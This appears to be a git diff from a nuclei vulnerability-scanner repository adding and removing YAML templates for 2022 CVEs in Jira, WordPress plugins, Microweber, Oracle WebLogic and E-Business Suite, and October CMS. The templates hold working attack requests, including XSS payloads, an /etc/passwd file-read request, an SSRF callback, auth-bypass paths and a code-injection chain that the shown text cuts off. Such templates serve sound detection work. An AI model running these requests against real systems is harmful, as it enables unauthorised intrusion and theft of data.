path: + - '{{BaseURL}}/karma.js' + - '{{BaseURL}}/?return_url=javascript:alert(document.domain)' + + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '< 6.3.14') + + - type: word + part: body_2 + words: + - 'Karma' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: version + group: 1 + regex: + - "(?m)VERSION: '([0-9.]+)'" + internal: true +# digest: 490a0046304402204c97963b2c55d78816e47e9082643bc3392fb33e44a68746d3a1b6d30b22e59a0220154cc96dfecd5bea5399a9a058028f23efaef7dc2388f685ebccc9a656947e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0540.yaml b/nuclei-templates/CVE-2022/cve-2022-0540.yaml deleted file mode 100644 index 477db3d259..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0540.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2022-0540 - -info: - name: Atlassian Jira Seraph - Authentication Bypass - author: DhiyaneshDK - severity: critical - description: | - Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential disruption of business operations. - remediation: Ensure you are using the latest version and that all security patches have been applied. - reference: - - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 - - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 - - https://jira.atlassian.com/browse/JRASERVER-73650 - - https://jira.atlassian.com/browse/JSDSERVER-11224 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-0540 - cwe-id: CWE-287 - epss-score: 0.2507 - epss-percentile: 0.96565 - cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: jira_data_center - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2022,atlassian,jira,exposure,auth-bypass - -http: - - method: GET - path: - - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' - - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'General Insight Configuration' - - - type: status - status: - - 200 -# digest: 4a0a00473045022100b356f158d98318a855357790576be317b29c040cc4b83e9ce5c9fe54fc6684eb02206bea066d8503896703de749d0cbdc015c9910fb42cc3671fa481e6e72d71ab25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0591.yaml b/nuclei-templates/CVE-2022/cve-2022-0591.yaml new file mode 100644 index 0000000000..fbc9d485a3 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0591.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-0591 + +info: + name: Formcraft3 <3.8.28 - Server-Side Request Forgery + author: Akincibor,j4vaovo + severity: critical + description: | + Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. + impact: | + An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning. + remediation: | + Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability. + reference: + - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0591 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-0591 + cwe-id: CWE-918 + epss-score: 0.03628 + epss-percentile: 0.90752 + cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: subtlewebinc + product: formcraft3 + framework: wordpress + fofa-query: body="formcraft3" && body="wp-" + tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc + +flow: http(1) && http(2) + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/formcraft3/' + + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: WordPress" +# digest: 4a0a00473045022050c800f22165b78eeeda568eae93aa6ad13be3c17759a4e4a051e32056d630fb022100bc6a9514b58758e47ce37be047e3846ad8b2d8eda04e468a964dbb7d400139cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0599.yaml b/nuclei-templates/CVE-2022/cve-2022-0599.yaml new file mode 100644 index 0000000000..52049ee911 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0599.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-0599 + +info: + name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting + author: scent2d + severity: medium + description: | + WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 + - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ + - https://nvd.nist.gov/vuln/detail/cve-2022-0599 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0599 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: mapping_multiple_urls_redirect_same_page_project + product: mapping_multiple_urls_redirect_same_page + framework: wordpress + tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan,mapping_multiple_urls_redirect_same_page_project + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="> HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + condition: and + + - type: word + part: body + words: + - 'id="mmursp_id" value="\">" />' +# digest: 4a0a00473045022016e69d448cdb51d0741136c370514655b3b59fbb6d1cf3a380f6ae0f7e750d3a022100e83f230b3198c39393f19898e616b7f18fdd706b693dda670dfe5964a3d7422a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0656.yaml b/nuclei-templates/CVE-2022/cve-2022-0656.yaml new file mode 100644 index 0000000000..62d781c125 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0656.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-0656 + +info: + name: uDraw <3.3.3 - Local File Inclusion + author: akincibor + severity: high + description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc). + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0656 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0656 + cwe-id: CWE-552 + epss-score: 0.00684 + epss-percentile: 0.77939 + cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: webtoprint + product: web_to_print_shop\ + google-query: inurl:"/wp-content/plugins/udraw" + tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + action=udraw_convert_url_to_base64&url=/etc/passwd + + matchers-condition: and + matchers: + - type: word + words: + - "cm9vd" # root in base64 + - "data:image\\/;base64" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e1754a9ee9845d4b7fff44b3fa86b0f357226bfe6c8e1a2188eec44df0349cc6022100821681fd1c6b34cb907739069bef0ac84c01aefb733c8bda81ee38300e2520d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0660.yaml b/nuclei-templates/CVE-2022/cve-2022-0660.yaml new file mode 100644 index 0000000000..03acf180ab --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0660.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-0660 + +info: + name: Microweber <1.2.11 - Information Disclosure + author: amit-jd + severity: high + description: | + Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate the vulnerability. + reference: + - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/ + - https://github.com/advisories/GHSA-hhrj-wp42-32v3 + - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0660 + - https://github.com/microweber/microweber/commit/2417bd2eda2aa2868c1dad1abf62341f22bfc20a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0660 + cwe-id: CWE-209 + epss-score: 0.00719 + epss-percentile: 0.78502 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: microweber + product: microweber + tags: cve,cve2022,microweber,disclosure,authenticated,huntr + +http: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + POST /module/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Referer: {{BaseURL}}admin/view:comments + + class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}} + + matchers: + - type: dsl + dsl: + - contains(body_2,'QueryException') + - contains(body_2,'SQLSTATE') + - contains(body_2,'runQueryCallback') + - 'contains(header_2,"text/html")' + - 'status_code_2==500' + condition: and +# digest: 490a00463044022006a6184e06a8bb2508ed86a39022ab8f8c89e52a6ee6b736be84fd8c1f355090022005d2a535f86a1e140b49cf1e94f2d5e08b7016c64e11b0a5ae67908a74aa59d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0963.yaml b/nuclei-templates/CVE-2022/cve-2022-0963.yaml new file mode 100644 index 0000000000..e2a7395a63 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0963.yaml @@ -0,0 +1,75 @@ +id: CVE-2022-0963 + +info: + name: Microweber <1.2.12 - Stored Cross-Site Scripting + author: amit-jd + severity: medium + description: | + Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability. It allows unrestricted upload of XML files,. + remediation: | + Upgrade Microweber CMS to version 1.2.12 or later to mitigate the vulnerability. + reference: + - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/ + - https://github.com/advisories/GHSA-q3x2-jvp3-wj78 + - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c + - https://nvd.nist.gov/vuln/detail/CVE-2022-0963 + - https://github.com/microweber/microweber/commit/975fc1d6d3fba598ee550849ceb81af23ce72e08 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0963 + cwe-id: CWE-79 + epss-score: 0.00144 + epss-percentile: 0.50156 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: microweber + product: microweber + tags: cve,cve2022,xss,microweber,cms,authenticated,huntr,intrusive + +http: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + POST /plupload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034 + Referer: {{BaseURL}}admin/view:modules/load_module:files + + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="name" + + {{randstr}}.xml + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="chunk" + + 0 + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="chunks" + + 1 + -----------------------------59866212126262636974202255034 + Content-Disposition: form-data; name="file"; filename="blob" + Content-Type: application/octet-stream + + alert(document.domain) + -----------------------------59866212126262636974202255034-- + - | + GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_3,"alert(document.domain)")' + - 'status_code_3==200' + - 'contains(body_2,"bytes_uploaded")' + condition: and +# digest: 4a0a0047304502204c9a4e25aee3216da25fd050f68cf7c0e5b0a4e65532f9f62d4b83f5058333e2022100dda270d1c7edbe6d34680d6f67ca827c790c9c53883fb2789a999d65b493962e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0968.yaml b/nuclei-templates/CVE-2022/cve-2022-0968.yaml new file mode 100644 index 0000000000..952a5dd550 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0968.yaml @@ -0,0 +1,84 @@ +id: CVE-2022-0968 + +info: + name: Microweber <1.2.12 - Integer Overflow + author: amit-jd + severity: medium + description: | + Microweber before 1.2.12 is susceptible to integer overflow. The application allows large characters to insert in the input field 'first & last name,' which can allow an attacker to cause a denial of service via a crafted HTTP request. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or denial of service. + remediation: First name and last name input should be limited to 50 characters or maximum 100 characters. + reference: + - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/ + - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv + - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e + - https://nvd.nist.gov/vuln/detail/CVE-2022-0968 + - https://github.com/microweber/microweber/commit/80e39084729a57dfe749626c3b9d35247a14c49e + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2022-0968 + cwe-id: CWE-190 + epss-score: 0.00076 + epss-percentile: 0.30933 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: microweber + product: microweber + tags: cve,cve2022,overflow,microweber,cms,huntr +variables: + payload: '{{repeat("A", 600)}}' + +http: + - raw: + - | + POST /api/user_login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1 + Host: {{Hostname}} + - | + POST /api/user/2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key= + + matchers: + - type: dsl + dsl: + - contains(body_3,'\"first_name\":\"{{payload}}\"') + - 'status_code_3==200' + - 'contains(header_3,"application/json")' + condition: and + + extractors: + - type: regex + name: form_token + group: 1 + regex: + - '
    Flowchart Maker & Online Diagram Software" - - - type: word - part: header - words: - - "application/octet-stream" -# digest: 4a0a00473045022070fec57cee168dfa730fadbe57cb5c221f9bbc81767e99ae42cea4202d386420022100b31dbec578fd188d61a9471d303929d0de903cd1f3017691aa45219d9059199a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1904.yaml b/nuclei-templates/CVE-2022/cve-2022-1904.yaml new file mode 100644 index 0000000000..3820f0dda5 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1904.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-1904 + +info: + name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. + remediation: | + Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b + - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1904 + cwe-id: CWE-79 + epss-score: 0.00086 + epss-percentile: 0.35299 + cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: fatcatapps + product: easy_pricing_tables + framework: wordpress + tags: cve,cve2022,wp,wordpress,wpscan,wp-plugin,xss,fatcatapps + +http: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ' - Color' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f0d3de44e68949e67afdcbc94a1a212c33edca970e0064f81a897227527305610221008238fd13b8c05c7a77dc4ee46a7be5d76677a486a9aedb272bf3d734248d2ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1906.yaml b/nuclei-templates/CVE-2022/cve-2022-1906.yaml new file mode 100644 index 0000000000..c7f69c82e4 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1906.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-1906 + +info: + name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting + author: random-robbie + severity: medium + description: | + WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation. + reference: + - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1906 + cwe-id: CWE-79 + epss-score: 0.00086 + epss-percentile: 0.35299 + cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: digiprove + product: copyright_proof + framework: wordpress + google-query: inurl:/wp-content/plugins/digiproveblog + tags: cve,cve2022,wordpress,xss,wp-plugin,wp,wpscan,digiprove + +http: + - raw: + - | + GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "got message " + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a004730450220111642dd830f905e2bc61167a87ef7ebcfd011ba7a4a363b319011a140401c71022100b7518f220308a6293499e4376ea4c4ab4f15e4049da8ad1de2f82d91395dbe62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-21371.yaml b/nuclei-templates/CVE-2022/cve-2022-21371.yaml new file mode 100644 index 0000000000..d9160b01fe --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21371.yaml @@ -0,0 +1,64 @@ +id: CVE-2022-21371 + +info: + name: Oracle WebLogic Server Local File Inclusion + author: paradessia,narluin + severity: high + description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. + impact: | + An attacker can read sensitive files containing credentials, configuration details, or other sensitive information. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability. + reference: + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 + - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 + - http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html + - https://github.com/Mr-xn/CVE-2022-21371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21371 + cwe-id: CWE-22 + epss-score: 0.96287 + epss-percentile: 0.9943 + cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: oracle + product: weblogic_server + tags: cve,cve2022,lfi,weblogic,oracle,packetstorm + +http: + - method: GET + raw: + - |+ + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: + - .//WEB-INF/weblogic.xml + - .//WEB-INF/web.xml + + stop-at-first-match: true + unsafe: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body, "")' + - 'contains(body, "")' + condition: or + + - type: dsl + dsl: + - 'contains(header, "text/xml")' + - 'contains(header, "application/xml")' + condition: or + + - type: status + status: + - 200 +# digest: 4a0a0047304502201b66dcd3b9fc90c4fd5587d8c4311347fa46f77f7ba6b467dc8f9e93550decd40221008a2c7b052f8c872b04c9422b81c00210ace794722fb697ee8b61866818625acd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml new file mode 100644 index 0000000000..578dc0e7cb --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21500.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-21500 + +info: + name: Oracle E-Business Suite <=12.2 - Authentication Bypass + author: 3th1c_yuk1,tess,0xpugazh + severity: high + description: | + Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application. + remediation: | + Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. + reference: + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 + - https://www.oracle.com/security-alerts/cpujul2022.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21500 + epss-score: 0.92631 + epss-percentile: 0.98947 + cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 4 + vendor: oracle + product: e-business_suite + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + tags: cve,cve2022,oracle,misconfig,auth-bypass + +http: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - 'Registration' + - 'Register as individual' + - '' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022077a908cc0f84943d99a897323cdeb2899210c5a6cd3d08634c62ced31283feeb022100a8428c5469152520da4ec621970240d45755a2c602d099e22dce986d12653785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-21705.yaml b/nuclei-templates/CVE-2022/cve-2022-21705.yaml new file mode 100644 index 0000000000..b697414512 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21705.yaml @@ -0,0 +1,116 @@ +id: CVE-2022-21705 + +info: + name: October CMS - Remote Code Execution + author: iPhantasmic + severity: high + description: | + October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 + - https://github.com/cyllective/CVEs + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74,NVD-CWE-Other + epss-score: 0.00522 + epss-percentile: 0.76405 + cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* + metadata: + max-request: 5 + vendor: octobercms + product: october + tags: cve2022,cve,authenticated,rce,cms,octobercms,injection + +http: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onSave + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + 